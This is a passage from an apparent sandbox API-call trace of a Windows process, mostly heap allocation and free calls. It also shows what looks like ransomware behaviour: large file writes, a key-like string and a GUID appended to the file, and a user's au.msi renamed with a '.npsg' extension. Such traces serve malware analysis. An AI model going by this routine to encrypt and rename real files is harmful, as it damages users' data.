1 [0242.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fd0 | out: hHeap=0x620000) returned 1 [0242.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0242.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0242.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89030 | out: hHeap=0x620000) returned 1 [0242.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0242.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0242.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0242.180] GetCurrentThreadId () returned 0x5b4 [0242.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0242.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b8a288 [0242.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0242.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a5d8 [0242.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0242.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0242.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0242.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0242.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0242.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0242.181] GetCurrentThreadId () returned 0x5b4 [0242.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0242.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0242.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0242.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0242.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0242.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0242.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0242.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0242.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0242.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0242.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0242.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0242.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0242.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0242.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89030 [0242.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0242.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0242.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0242.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0242.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0242.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0242.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0242.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0242.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fd0 [0242.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0242.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0242.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0242.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0242.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0242.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0242.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0242.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88fe8 [0242.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0242.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0242.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0242.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fb8 [0242.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0242.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89048 [0242.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0242.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0242.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0242.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89018 [0242.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0242.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89000 [0242.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0242.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89060 [0242.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89000 | out: hHeap=0x620000) returned 1 [0242.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89000 [0242.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89018 | out: hHeap=0x620000) returned 1 [0242.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0242.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0242.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0242.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0242.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0242.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fd0 | out: hHeap=0x620000) returned 1 [0242.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88fd0 [0242.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0242.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0242.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89030 | out: hHeap=0x620000) returned 1 [0242.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0242.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89060 | out: hHeap=0x620000) returned 1 [0242.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0242.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0242.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bc90 [0242.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0242.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0242.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fd0 | out: hHeap=0x620000) returned 1 [0242.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0242.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0242.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0242.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0242.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a5d8 | out: hHeap=0x620000) returned 1 [0242.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0242.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0242.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0242.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0242.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0242.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0242.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bc90 | out: hHeap=0x620000) returned 1 [0242.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0242.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89000 | out: hHeap=0x620000) returned 1 [0242.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0242.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89048 | out: hHeap=0x620000) returned 1 [0242.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0242.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fe8 | out: hHeap=0x620000) returned 1 [0242.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fb8 | out: hHeap=0x620000) returned 1 [0242.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0242.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0242.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0242.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fa0 | out: hHeap=0x620000) returned 1 [0242.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fb68 | out: hHeap=0x620000) returned 1 [0242.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0242.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0242.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0242.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0242.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0242.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0242.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0242.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0242.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0242.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0242.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0242.205] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x25800, lpOverlapped=0x0) returned 1 [0242.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0242.206] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x2d400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0242.206] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0242.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0242.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0242.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0242.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0242.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0242.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0242.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d188 | out: hHeap=0x620000) returned 1 [0242.207] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0242.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0242.207] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0242.207] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0242.207] CloseHandle (hObject=0x644) returned 1 [0242.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eb50 [0242.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b8bcd0 [0242.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eb50 | out: hHeap=0x620000) returned 1 [0242.217] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi.npsg")) returned 1 [0242.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8bcd0 | out: hHeap=0x620000) returned 1 [0242.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0242.218] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0242.220] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2d400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="au.msi", cAlternateFileName="")) returned 0 [0242.220] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0242.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0242.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a220 | out: hHeap=0x620000) returned 1 [0242.220] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0242.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eb50 [0242.220] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0242.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0242.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0242.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0242.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0242.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0242.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0242.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0242.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0242.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0242.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0242.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.226] RtlAllocateHeap 